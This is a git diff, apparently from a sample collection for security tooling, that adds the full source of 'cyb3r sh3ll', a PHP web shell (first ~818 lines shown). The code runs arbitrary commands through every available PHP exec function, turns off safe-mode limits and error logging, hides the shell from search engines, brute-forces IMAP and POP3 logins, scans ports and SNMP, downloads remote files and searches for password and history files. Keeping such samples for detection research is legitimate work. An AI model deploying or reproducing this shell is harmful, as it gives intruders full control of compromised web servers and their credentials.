summaryrefslogtreecommitdiff
path: root/data/samples/classic/cyb3rsh3ll.php
diff options
context:
space:
mode:
Diffstat (limited to 'data/samples/classic/cyb3rsh3ll.php')
-rw-r--r--data/samples/classic/cyb3rsh3ll.php7923
1 files changed, 7923 insertions, 0 deletions
diff --git a/data/samples/classic/cyb3rsh3ll.php b/data/samples/classic/cyb3rsh3ll.php
new file mode 100644
index 0000000..e0e0095
--- /dev/null
+++ b/data/samples/classic/cyb3rsh3ll.php
@@ -0,0 +1,7923 @@
1<?php
2//Authentication
3$lock = "on"; // set this to off if you dont need the login page
4$user = "cyber";
5$pass = "gladiator";
6$antiCrawler = "on"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
7$tracebackFeature = "off"; // set this feature to on to enable email alerts
8$log_email = "cyb3r.gladiat0r@gmail.com"; //Default e-mail for sending logs
9
10@ignore_user_abort(TRUE);
11@set_magic_quotes_runtime(0);
12error_reporting(5);
13$phpVersion = phpversion();
14$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
15$win = strtolower(substr(PHP_OS,0,3)) == "win";
16$shver = "1.0"; //Current version
17if (!function_exists("getmicrotime")) {
18 function getmicrotime() {
19 list($usec, $sec) = explode(" ", microtime());
20 return ((float)$usec + (float)$sec);
21 }
22 }
23
24define("starttime",getmicrotime());
25
26if (get_magic_quotes_gpc()) {
27 if (!function_exists("strips")) {
28 function strips(&$arr,$k="") {
29 if (is_array($arr)) {
30 foreach($arr as $k=>$v) {
31 if (strtoupper($k) != "GLOBALS") {
32 strips($arr["$k"]);
33 }
34 }
35 } else {
36 $arr = stripslashes($arr);
37 }
38 }
39 }
40 strips($GLOBALS);
41}
42
43foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
44if (!empty($unset_surl)) {setcookie("cyb3r_surl"); $surl = "";}
45elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("cyb3r_surl",$surl);}
46else {$surl = $_REQUEST["cyb3r_surl"]; //Set this cookie for manual SURL
47
48}
49$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
50if ($surl_autofill_include and !$_REQUEST["cyb3r_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
51
52if (empty($surl))
53{ $surl = "?".$includestr; }//Self url
54$surl = htmlspecialchars($surl);
55$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
56
57$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";
58//DON'T FORGOT ABOUT PASSWORD!!!
59
60$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
61$gzipencode = False; //Encode with gzip?
62
63$ax4 ="http://";
64$filestealth = TRUE; //if TRUE, don't change modify- and access-time
65
66$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";
67$release = @php_uname('r');
68$kernel = @php_uname('s');
69$expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text=';
70if( strpos('Linux', $kernel) !== false )
71 $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
72else
73 $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) );
74
75/* If you publish free shell and you wish add link to your site or any other information, put here your html. */
76
77$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
78
79$curdir = "./"; //start folder
80
81//$curdir = getenv("DOCUMENT_ROOT");
82$curdir = getcwd();
83$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
84
85$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
86
87
88$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
89
90$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
91
92if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
93function imaplogiN($host,$username,$password){
94$sock=fsockopen($host,143,$n,$s,5);
95$b=namE();
96$l=strlen($b);
97if(!$sock)return -1;
98fread($sock,1024);
99fputs($sock,"$b LOGIN $username $password\r\n");
100$res=fgets($sock,$l+4);
101if ($res == "$b OK")return 1;else return 0;
102fclose($sock);
103}
104function pop3logiN($server,$user,$pass){
105$sock=fsockopen($server,110,$en,$es,5);
106if(!$sock)return -1;
107fread($sock,1024);
108fwrite($sock,"user $user\n");
109$r=fgets($sock);
110if($r{0}=='-')return 0;
111fwrite($sock,"pass $pass\n");
112$r=fgets($sock);
113fclose($sock);
114if($r{0}=='+')return 1;
115return 0;
116}
117function check_urL($url,$method,$search,$timeout){
118if(empty($search))$search='200';
119$u=parse_url($url);
120$method=strtoupper($method);
121$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
122$data=(!empty($u['query']))?$u['query']:'';
123if(!empty($data))$data="?$data";
124$sock=@fsockopen($host,80,$en,$es,$timeout);
125if($sock){
126fputs($sock,"$method $file$data HTTP/1.0\r\n");
127fputs($sock,"Host: $host\r\n");
128if($method=='GET')fputs($sock,"\r\n");
129elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
130else return 0;
131if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
132while(!feof($sock)){
133$res=trim(fgets($sock));
134if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
135}
136fclose($sock);
137}
138return 0;
139}
140function snmpchecK($ip,$com,$timeout){
141$res=0;
142$n=chr(0x00);
143$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)).
144$com. chr(0xA0).
145chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
146chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
147chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
148chr(0x01). chr(0x01). $n. chr(0x05). $n;
149$sock=@fsockopen("udp://$ip",161);
150socket_set_timeout($sock,$timeout);
151@fputs($sock,$packet);
152socket_set_timeout($sock,$timeout);
153$res=fgets($sock);
154fclose($sock);
155return $res;
156}
157function checkthisporT($ip,$port,$timeout,$type=0){
158if(!$type){
159$scan=@fsockopen($ip,$port,$n,$s,$timeout);
160if($scan){fclose($scan);return 1;}
161}
162elseif(function_exists('socket_set_timeout')){
163$scan=@fsockopen("udp://".$ip,$port);
164if($scan){
165socket_set_timeout($scan,$timeout);
166@fwrite($scan,"\x00");
167$s=time();
168fread($scan,1);
169if((time()-$s)>=$timeout){fclose($scan);return 1;}
170}
171}
172return 0;
173}
174function get_sw_namE($host,$timeout){
175$sock=@fsockopen($host,80,$en,$es,$timeout);
176if($sock){
177$page=namE().namE();
178fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
179while(!feof($sock)){
180$con=fgets($sock);
181if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
182}
183fclose($sock);
184return -1;
185}return 0;
186}
187function getDisabledFunctions(){
188 if(!ini_get('disable_functions'))
189 {
190 echo "None";
191 }
192 else
193 {
194 echo @ini_get('disable_functions');
195 }
196}
197function showsizE($size){
198if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
199elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
200elseif ($size>=1024)$size = round(($size/1024),2)." KB";
201else $size .= " B";
202return $size;
203}
204function whereistmP(){
205$uploadtmp=ini_get('upload_tmp_dir');
206$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
207if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
208if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
209if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
210if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
211if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
212return ".";
213}
214function downloadiT($get,$put){
215$fo=@strtolower(ini_get('allow_url_fopen'));
216if($fo || $fo=='on')$con=file_get_contents($get);
217else{
218$u=parse_url($get);
219$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
220$url=fsockopen($host, 80, $en, $es, 12);
221fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
222$tmp=$con='';
223while($tmp!="\r\n")$tmp=fgets($url);
224while(!feof($url))$con.=fgets($url);
225}
226$mk=file_put_contents($put,$con);
227if($mk)return 1;
228return 0;
229}
230function flusheR(){
231flush();@ob_flush();
232}
233function namE(){
234$name='';
235srand((double)microtime()*100000);
236for ($i=0;$i<=rand(3,10);$i++){
237$name.=chr(rand(97,122));
238}
239return $name;
240}
241function hlinK($str=""){
242$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL');
243$ret=$_SERVER['PHP_SELF']."?";
244$new=explode("&",$str);
245foreach ($_GET as $key => $v){
246$add=1;
247foreach($new as $m){
248$el = explode("=", $m);
249if ($el[0]==$key)$add=0;
250}
251if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
252}
253$ret.=$str;
254return $ret;
255}
256function shelL($command){
257global $windows,$disablefunctions;
258$exec = '';$output= '';
259$dep[]=array('pipe','r');$dep[]=array('pipe','w');
260if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
261elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
262elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
263elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
264elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
265elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
266elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
267return $exec;
268}
269// Registered file-types.
270// array(
271// "{action1}"=>array("ext1","ext2","ext3",...),
272// "{action2}"=>array("ext4","ext5","ext6",...),
273// ...
274// )
275$ftypes = array(
276 "html"=>array("html","htm","shtml"),
277 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
278 "exe"=>array("sh","install","bat","cmd"),
279 "ini"=>array("ini","inf"),
280 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
281 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
282 "sdb"=>array("sdb"),
283 "phpsess"=>array("sess"),
284 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
285);
286// Registered executable file-types.
287// array(
288// string "command{i}"=>array("ext1","ext2","ext3",...),
289// ...
290// )
291// {command}: %f% = filename
292$exeftypes = array(
293 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
294 "perl %f%" => array("pl","cgi")
295);
296/* Highlighted files.
297 array(
298 i=>array({regexp},{type},{opentag},{closetag},{break})
299 ...
300 )
301 string {regexp} - regular exp.
302 int {type}:
3030 - files and folders (as default),
3041 - files only, 2 - folders only
305 string {opentag} - open html-tag, e.g. "<b>" (default)
306 string {closetag} - close html-tag, e.g. "</b>" (default)
307 bool {break} - if TRUE and found match then break
308*/
309$regxp_highlight = array(
310 array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
311 array("config.php",1) // example
312);
313$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
314 // array (i=>{letter} ...); string {letter} - letter of a drive
315//$safemode_diskettes = range("a","z");
316$hexdump_lines = 8;// lines in hex preview file
317$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
318$cx7 =".com";
319$nixpwdperpage = 100; // Get first N lines from /etc/passwd
320$bindport_pass = "cyb3r"; // default password for binding
321$bindport_port = "31373"; // default port for binding
322$bc_port = "31373"; // default port for back-connect
323$cx4 ="/x.";
324$datapipe_localport = "8081"; // default port for datapipe
325// Command-aliases
326if (!$win)
327{
328 $cmdaliases = array(
329 array("-----------------------------------------------------------", "ls -la"),
330 array("find all suid files", "find / -type f -perm -04000 -ls"),
331 array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
332 array("find all sgid files", "find / -type f -perm -02000 -ls"),
333 array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
334 array("find config.inc.php files", "find / -type f -name config.inc.php"),
335 array("find config* files", "find / -type f -name \"config*\""),
336 array("find config* files in current dir", "find . -type f -name \"config*\""),
337 array("find all writable folders and files", "find / -perm -2 -ls"),
338 array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
339 array("find all service.pwd files", "find / -type f -name service.pwd"),
340 array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
341 array("find all .htpasswd files", "find / -type f -name .htpasswd"),
342 array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
343 array("find all .bash_history files", "find / -type f -name .bash_history"),
344 array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
345 array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
346 array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
347 array("list file attributes on a Linux second extended file system", "lsattr -va"),
348 array("show opened ports", "netstat -an | grep -i listen")
349 );
350}
351else
352{
353 $cmdaliases = array(
354 array("-----------------------------------------------------------", "dir"),
355 array("show opened ports", "netstat -an")
356 );
357}
358$sess_cookie = "cyb3rvars"; // Cookie-variable name
359$usefsbuff = TRUE; //Buffer-function
360$px7 ="html";
361$copy_unset = FALSE; //Remove copied files from buffer after pasting
362//Quick launch
363$quicklaunch = array(
364 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
365 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
366 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
367 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
368 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
369 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
370 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
371 array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
372 array("<b>Shell</b>",$surl."act=shells&d=%d"),
373 array("<b>Cracker</b>",$surl."act=cracker&d=%d"),
374 array("<b>Scanner</b>",$surl."act=scanner&d=%d"),
375 array("<b>Net Tools</b>",$surl."act=nettools&d=%d"),
376 array("<b>SQL</b>",$surl."act=sql&d=%d"),
377 array("<b>PHP-code</b>",$surl."act=phpcode&d=%d"),
378 array("<b>Mailer</b>",$surl."act=mailer&d=%d"), //update this section copy from b3t4k shell hardeep
379 array("<b>DOS</b>",$surl."act=dos&d=%d"), //update this section copy from b3t4k shell hardeep
380 array("<b>Local Domain</b>",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell hardeep
381 array("<b>Upload</b>",$surl."act=upload&d=%d"),
382 array("<b>About</b>",$surl."act=about&d=%d"), //update this section copy from b3t4k shell hardeep
383 );
384//Highlight-code colors
385$highlight_background = "#c0c0c0";
386$highlight_bg = "#FFFFFF";
387$highlight_comment = "#6A6A6A";
388$highlight_default = "#0000BB";
389$highlight_html = "#1300FF";
390$highlight_keyword = "#007700";
391$highlight_string = "#000000";
392@$f = $_REQUEST["f"];
393@extract($_REQUEST["cyb3rcook"]);
394//END CONFIGURATION
395// -------------- Traceback Functions
396function sendLoginAlert()
397{
398 global $ownerEmail;
399 global $url;
400 $ref=$_SERVER['HTTP_REFERER'];
401 $agent=$_SERVER['HTTP_USER_AGENT'];
402 $accesedIp = $_SERVER['REMOTE_ADDR'];
403 $randomInt = rand(0,1000000); # to avoid id blocking
404 $from = "cyb3r-sh3ll$randomInt@cyb3r.gladiat0r.com";
405 //echo $from;
406 if(function_exists('mail'))
407 {
408 $subject = "Shell Accessed -- cyb3r-Sh3ll --";
409 $message = "
410Hey Owner ,
411
412 Your Shell(cyb3r-Sh3ll) located at $url was accessed by $accesedIp this mail refered by $ref
413 Your shell was accesed by $agent
414
415 If its not you :-
416
417 1. Please check if the shell is secured.
418 2. Change your user name and Password.
419 3. Check if lock is 0n!
420
421 Thanking You
422
423Yours Faithfully
424cyb3r Sh3ll
425 ";
426 mail($ownerEmail,$subject,$message,'From:'.$from);
427 }
428}
429
430//---------------------------------------------------------
431if(function_exists('session_start') && $lock == 'on')
432{
433 session_start();
434}
435else
436{
437 // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
438 $lock = 'off';
439}
440
441//logout
442if(isset($_GET['logout']) && $lock == 'on')
443{
444 $_SESSION['authenticated'] = 0;
445 session_destroy();
446 header("location: ".$_SERVER['PHP_SELF']);
447}
448
449/***************** Restoring *******************************/
450ini_restore("safe_mode_include_dir");
451ini_restore("safe_mode_exec_dir");
452ini_restore("disable_functions");
453ini_restore("allow_url_fopen");
454ini_restore("safe_mode");
455ini_restore("open_basedir");
456if(function_exists('ini_set'))
457{
458 ini_set('error_log',NULL); // No alarming logs
459 ini_set('log_errors',0); // No logging of errors
460 ini_set('file_uploads',1); // Enable file uploads
461 ini_set('allow_url_fopen',1); // allow url fopen
462}
463
464else
465{
466 ini_alter('error_log',NULL);
467 ini_alter('log_errors',0);
468 ini_alter('file_uploads',1);
469 ini_alter('allow_url_fopen',1);
470}
471// ----------------------------------------------------------------------------------------------------------------
472// \/Next code isn't for editing\/
473@set_time_limit(0);
474$tmp = array();
475foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
476$s = "!^(".implode("|",$tmp).")$!i";
477if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"#\">cyb3r sh3ll</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
478?>
479<html>
480<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">
481<title>cyb3r sh3ll | India - <?php echo getenv("HTTP_HOST"); ?></title>
482<?php
483if($antiCrawler != 'off')
484{
485 ?>
486 <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
487 <?php
488}
489?>
490<STYLE>
491TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #15354C; scrollbar-shadow-color: #15354C; scrollbar-highlight-color: #15354C; scrollbar-3dlight-color: #15354C scrollbar-darkshadow-color: #15354C; scrollbar-track-color: #050E14; scrollbar-arrow-color: #D9D9D9; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #050e14;}</style>
492</head>
493<BODY text=#ffffff bottomMargin=0 bgColor=#050e14 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
494<?php
495if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
496{
497 if( $_POST['user'] == $user &&
498 $_POST['pass'] == $pass )
499 {
500 $_SESSION['authenticated'] = 1;
501 // --------------------- Tracebacks --------------------------------
502 if($tracebackFeature == 'On')
503 {
504 sendLoginAlert();
505 }
506 // ------------------------------------------------------------------
507 }
508}
509
510if($lock == 'off')
511{?>
512 <p><font color=red><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
513<?php
514}
515
516if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
517{
518
519?>
520<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor='#15354c' borderColorLight='#c0c0c0' border=1 bordercolor='#C0C0C0'>
521<tr><td valign='top'><center><font face="times, serif" size="3" color="white">Welcome to the most advanced PHP web Shell- <b><font color=orange>cyb</font>3r Sh<font color=green>3ll</font></b> :: By cyb3r gl4d!470r ...</font></center></td>
522</tr>
523</table>
524<br/>
525
526
527<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0 bordercolor='#C0C0C0'>
528<tr>
529
530<td width="50%"><center><img src="http://s15.postimage.org/94kp4a0ej/indian_flag.png" /></center></td>
531<td><center><img src="http://s15.postimage.org/whiqmsgi3/gladiator.png" width="352px" height="500px"/></center></td>
532</tr>
533</table>
534<div style="position:absolute; border-style:solid;border-width:0px; top:280px;left:280px; right:430px; bottom:180px;" >
535<center><font face="times, serif" color="white">
536 <h1><?php echo $welcome; ?></h1><br /><br />
537 <form method="POST" action="">
538 <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input type="Submit" value="Own This Box!"/>
539 </form>
540 <font size="3">Coded by cyb3r 9ladiat0r for all hacking communities working for my motherland.......<br/><br/>
541
542 Always there to serve my country, My India on any Terms...</font>
543
544 </font>
545</center>
546</div>
547<br/>
548<?php
549}
550//---------------------------------- We are authenticated now-------------------------------------
551//Launch the shell
552else
553{
554
555if ($act != "img")
556
557{
558
559$lastdir = realpath(".");
560
561chdir($curdir);
562
563if ($selfwrite or $updatenow) {@ob_clean(); cyb3r_getupdate($selfwrite,1); exit;}
564
565$sess_data = unserialize($_COOKIE["$sess_cookie"]);
566
567if (!is_array($sess_data)) {$sess_data = array();}
568
569if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
570
571if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
572
573
574
575$disablefunc = @ini_get("disable_functions");
576
577if (!empty($disablefunc))
578
579{
580
581 $disablefunc = str_replace(" ","",$disablefunc);
582
583 $disablefunc = explode(",",$disablefunc);
584
585}
586
587
588
589if (!function_exists("cyb3r_buff_prepare"))
590
591{
592
593function cyb3r_buff_prepare()
594
595{
596
597 global $sess_data;
598
599 global $act;
600
601 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
602
603 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
604
605 $sess_data["copy"] = array_unique($sess_data["copy"]);
606
607 $sess_data["cut"] = array_unique($sess_data["cut"]);
608
609 sort($sess_data["copy"]);
610
611 sort($sess_data["cut"]);
612
613 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
614
615 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
616
617}
618
619}
620
621cyb3r_buff_prepare();
622
623if (!function_exists("cyb3r_sess_put"))
624
625{
626
627function cyb3r_sess_put($data)
628
629{
630
631 global $sess_cookie;
632
633 global $sess_data;
634
635 cyb3r_buff_prepare();
636
637 $sess_data = $data;
638
639 $data = serialize($data);
640
641 setcookie($sess_cookie,$data);
642
643}
644
645}
646
647foreach (array("sort","sql_sort") as $v)
648
649{
650
651 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
652
653 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
654
655}
656
657if ($sort_save)
658
659{
660
661 if (!empty($sort)) {setcookie("sort",$sort);}
662
663 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
664
665}
666
667if (!function_exists("str2mini"))
668
669{
670
671function str2mini($content,$len)
672
673{
674
675 if (strlen($content) > $len)
676
677 {
678
679 $len = ceil($len/2) - 2;
680
681 return substr($content, 0,$len)."...".substr($content,-$len);
682
683 }
684
685 else {return $content;}
686
687}
688
689}
690
691if (!function_exists("view_size"))
692
693{
694
695function view_size($size)
696
697{
698
699 if (!is_numeric($size)) {return FALSE;}
700
701 else
702
703 {
704
705 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
706
707 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
708
709 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
710
711 else {$size = $size . " B";}
712
713 return $size;
714
715 }
716
717}
718
719}
720
721if (!function_exists("fs_copy_dir"))
722
723{
724
725function fs_copy_dir($d,$t)
726
727{
728
729 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
730
731 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
732
733 $h = opendir($d);
734
735 while (($o = readdir($h)) !== FALSE)
736
737 {
738
739 if (($o != ".") and ($o != ".."))
740
741 {
742
743 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
744
745 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
746
747 if (!$ret) {return $ret;}
748
749 }
750
751 }
752
753 closedir($h);
754
755 return TRUE;
756
757}
758
759}
760
761if (!function_exists("fs_copy_obj"))
762
763{
764
765function fs_copy_obj($d,$t)
766
767{
768
769 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
770
771 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
772
773 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
774
775 if (is_dir($d))
776
777 {
778
779 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
780
781 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
782
783 return fs_copy_dir($d,$t);
784
785 }
786
787 elseif (is_file($d)) {return copy($d,$t);}
788
789 else {return FALSE;}
790
791}
792
793}
794
795if (!function_exists("fs_move_dir"))
796
797{
798
799function fs_move_dir($d,$t)
800
801{
802
803 $h = opendir($d);
804
805 if (!is_dir($t)) {mkdir($t);}
806
807 while (($o = readdir($h)) !== FALSE)
808
809 {
810
811 if (($o != ".") and ($o != ".."))
812
813 {
814
815 $ret = TRUE;
816
817 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
818
